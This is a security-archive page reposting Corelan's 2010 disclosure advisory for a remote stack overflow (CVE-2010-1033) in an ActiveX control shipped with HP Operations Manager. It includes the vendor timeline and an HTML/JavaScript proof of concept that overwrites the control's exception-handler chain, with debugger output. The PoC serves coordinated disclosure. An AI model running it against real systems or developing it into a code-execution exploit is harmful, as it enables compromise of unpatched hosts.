what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

HP Operations Manager 7.5 / 8.10 / 8.16 Remote Stack Overflow

HP Operations Manager 7.5 / 8.10 / 8.16 Remote Stack Overflow
Posted Apr 20, 2010
Authored by mr_me | Site corelan.be

HP Operations Manager versions 7.5, 8.10 and 8.16 suffer from a remote stack overflow vulnerability. Exploit included.

tags | exploit, remote, overflow
advisories | CVE-2010-1033
SHA-256 | f6dcb05657875a0c205848a9a614db696f308ed1f94ec31aa62d579c64f81ee0
Download | Favorite | View

HP Operations Manager 7.5 / 8.10 / 8.16 Remote Stack Overflow

Change Mirror Download
|------------------------------------------------------------------|
|                         __               __                      |
|   _________  ________  / /___ _____     / /____  ____ _____ ___  |
|  / ___/ __ \/ ___/ _ \/ / __ `/ __ \   / __/ _ \/ __ `/ __ `__ \ |
| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |
| \___/\____/_/   \___/_/\__,_/_/ /_/   \__/\___/\__,_/_/ /_/ /_/  |
|                                                                  |
|                                       http://www.corelan.be:8800 |
|                                              security@corelan.be |
|                                                                  |
|-------------------------------------------------[ EIP Hunters ]--|
|                                                                  |
|                 Vulnerability Disclosure Report                  |
|                                                                  |
|------------------------------------------------------------------| 

Advisory : CORELAN-10-027
Disclosure date : 20/4/2010
References :
  HP : http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02078800
  Corelan : http://www.corelan.be:8800/advisories.php?id=CORELAN-10-027
  CVE : CVE-2010-1033


0x00 : Vulnerability information

- Product : HP Operations Manager
- Version : v7.5, v8.10 and v8.16
- Vendor : http://www.hp.com/
- URL : http://www.hp.com/
- Platform : Windows
- Type of vulnerability : Remote Stack overflow
- Risk rating : Medium
- Issue fixed in version : Version:1 (rev.1) - 19 April 2010 Initial release
- Vulnerability discovered by : mr_me
- Corelan Team : http://www.corelan.be:8800/index.php/security/corelan-team-members/

Affected versions :
HP Operations Manager for Windows v8.10, v8.16 with srcvw4.dll v4.0.1.1 and earlier 
HP Operations Manager for Windows v7.5 with srcvw32.dll v2.23.28 and earlier


0x01 : Vendor description of software

HP Operations Manager is a consolidated event and performance management console that correlates infrastructure, network and end-user experience events across your entire IT infrastructure. It monitors both physical and virtual servers to identify the root cause of event storms, allowing faster time to resolution at lower cost.
This software helps your IT staff improve its efficiencies by automating performance and availability monitoring. It provides a consolidated view into infrastructure health that helps you prevent service outages. And it allows your organization to handle more tasks on your own, freeing subject matter experts to focus on more strategic tasks.
HP Operations Manager can also incorporate agent-less monitoring using HP SiteScope software. In addition, when used in conjunction with Operations Orchestration, it automates routine tasks, reducing the labor required to manage your IT operations.


0x02 : Vulnerability details

By loading the activeX control (GUID: 366C9C52-C402-416B-862D-1464F629CA59) LoadFile() in the module srcvw4.dll an
attacker can pass an overly long string value and overwrite the exception handler, thus, hijacking the flow of execution.  


0x03 : Vendor communication

- 30th Mar, 2010 - Initial vendor contact
- 31st Mar, 2010 - Vendor acknowledged the issue and requested PoC
- 31st Mar, 2010 - Sent PoC code
- 1st Apr, 2010 - Vendor confirmed the vulnerability
- 13th Apr, 2010 - Vendor notified us that they will release security bulletin and patch
- 20th Apr, 2010 - Vendor releases security bulletin
- 20th Apr, 2010 - Public Disclosure


0x04 : Exploit

<html>
<!--
    |------------------------------------------------------------------|
    |                         __               __                      |
    |   _________  ________  / /___ _____     / /____  ____ _____ ___  |
    |  / ___/ __ \/ ___/ _ \/ / __ `/ __ \   / __/ _ \/ __ `/ __ `__ \ |
    | / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |
    | \___/\____/_/   \___/_/\__,_/_/ /_/   \__/\___/\__,_/_/ /_/ /_/  |
    |                                                                  |
    |                                       http://www.corelan.be:8800 |
    |                                              security@corelan.be |
    |                                                                  |
    |-------------------------------------------------[ EIP Hunters ]--|

# HP Operations Manager <= v8.16 - (srcvw4.dll) LoadFile()/SaveFile() Remote Unicode Stack Overflow PoC
# Found by: mr_me - http://net-ninja.net/
# Homepage: http://www.hp.com/
# CVE: CVE-2010-1033
# Tested on: Windows XP SP3 (IE 6 & 7)
# Marked safe for scripting: No
# Module path: C:\Program Files\HP\HP BTO Software\bin\srcvw4.dll
# HP's Advisory: http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02078800
# Advisory: http://www.corelan.be:8800/advisories.php?id=10-027
# Greetz: Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
# ######################################################################################################
# Notes: 
# - This is a 3rd party library by Tetradyne Inc (not from HP) but HP take full responsibility
# - /SafeSEH protected module
# - The SaveFile() function is also vulnerable to a unicode stack overflow. 
# - Having '\x42' or 'B' as the 2nd byte of nseh will cause us to overwrite the address
#   of seh handler itself and not the contents.
# - There is simply no code execution on this because there is no unicode friendly
#   ppr's that I know of. However you could include other components, to get code execution.
# ######################################################################################################
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
#
# Note : you are not allowed to edit/modify this code.  
# If you do, Corelan cannot be held responsible for any damages this may cause.

The Registers:

EAX 002BD012
ECX 000AEAAA
EDX 02A90024 UNICODE "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"..
EBX 80070003
ESP 0013DA1C
EBP 0013DA70 UNICODE "Could not open file AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"..
ESI 02A9258C UNICODE "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"..
EDI 00140000 ASCII "Actx "
EIP 024DA413 srcvw4.024DA413

The stack:

0013B600   00410041  A.A.  iexplore.00410041
0013B604   00410041  A.A.  iexplore.00410041
0013B608   00430043  C.C.  Pointer to next SEH record
0013B60C   00420042  B.B.  SE handler
0013B610   00440044  D.D.
0013B614   00440044  D.D.

And remember, its better to try and fail, then fail to try :-)
-->
<object classid='clsid:366C9C52-C402-416B-862D-1464F629CA59' id='boom' ></object>
<script language="JavaScript" defer> 
  function b00m()  
   {  
    var buffSize = 1072;
  var x = unescape("%41");
  var y = unescape("%44");
  // 'B' or \x41 as the 2nd byte of nseh will destroy our SEH chain
  var nseh = unescape("%43%43");
  var seh = unescape("%42%42");
  while (x.length<buffSize) x += x;  
    x = x.substring(0,buffSize); 
  while (y.length<buffSize) y += y;  
    y = y.substring(0,buffSize);  
    boom.LoadFile(x+nseh+seh+y);
  }  
</script>  
<body onload="JavaScript: return b00m();">    
<p><center>~ mr_me presents ~</p>
<p><b>HP Operations Manager <= v8.16 - (srcvw4.dll) LoadFile()/SaveFile() Remote Unicode Stack Overflow PoC</b></center></p> 
</body>
</html>
Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    28 Files
  • 16
    Jul 16th
    6 Files
  • 17
    Jul 17th
    34 Files
  • 18
    Jul 18th
    6 Files
  • 19
    Jul 19th
    34 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    19 Files
  • 23
    Jul 23rd
    17 Files
  • 24
    Jul 24th
    47 Files
  • 25
    Jul 25th
    31 Files
  • 26
    Jul 26th
    13 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    27 Files
  • 30
    Jul 30th
    49 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close